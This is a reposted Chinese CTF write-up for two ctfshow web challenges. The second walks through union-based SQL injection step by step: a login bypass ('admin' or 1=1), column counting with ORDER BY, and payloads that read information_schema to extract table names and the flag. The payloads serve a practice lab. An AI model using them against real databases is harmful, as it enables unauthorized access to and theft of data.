web01
右键查看源代码,再使用在线解密,就可以得出答案了文章来源:https://www.toymoban.com/news/detail-839545.html
web02 sql注入
-
admin' or 1=1或者1 or 1=1可以登录 - 查询几个字段:
1' or 1=1 order by 3 #使用此语句,判断列数。
order by 3不会出错,但是order by 4就没有显示了,因此判断共有3列。
ORDER BY 子句中的数字(如 ORDER BY 4)通常表示按照查询结果中的第几个列进行排序,而不是列名。这意味着 ORDER BY 4 将根据查询结果中的第四列进行排序。
- 使用
-1' union select 1,2,3 #判断回显的位置
发现回显位置是2
-
1' union select 1,database(),3#查看数据库名称,发现是web2 -
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database(); #查看数据库中的表,返回有欢迎你,flag,user,说明一共有两个表,分别是flag和user -
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag';#查看列名,发现只有flag -
1' union select 1,group_concat(flag),3 from web2.flag;#显示数据,得到答案了
补充知识:文章来源地址https://www.toymoban.com/news/detail-839545.html
-
group_concat(table_name)是一个聚合函数,它将返回符合 WHERE 条件的所有表的名称,并用逗号分隔。 -
information_schema是一个标准的数据库系统中的元数据信息存储区域,它包含了关于数据库结构的信息,比如数据库、表、列、索引等的信息。 - 万能密码:
admin' or 1=1#
到了这里,关于小白刷题CTF show web方向的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![2023年“羊城杯”网络安全大赛 决赛 AWDP [Break+Fix] Web方向题解wp 全](https://imgs.yssmx.com/Uploads/2024/02/722068-1.png)
![[CTF/网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)](https://imgs.yssmx.com/Uploads/2024/02/715849-1.png)
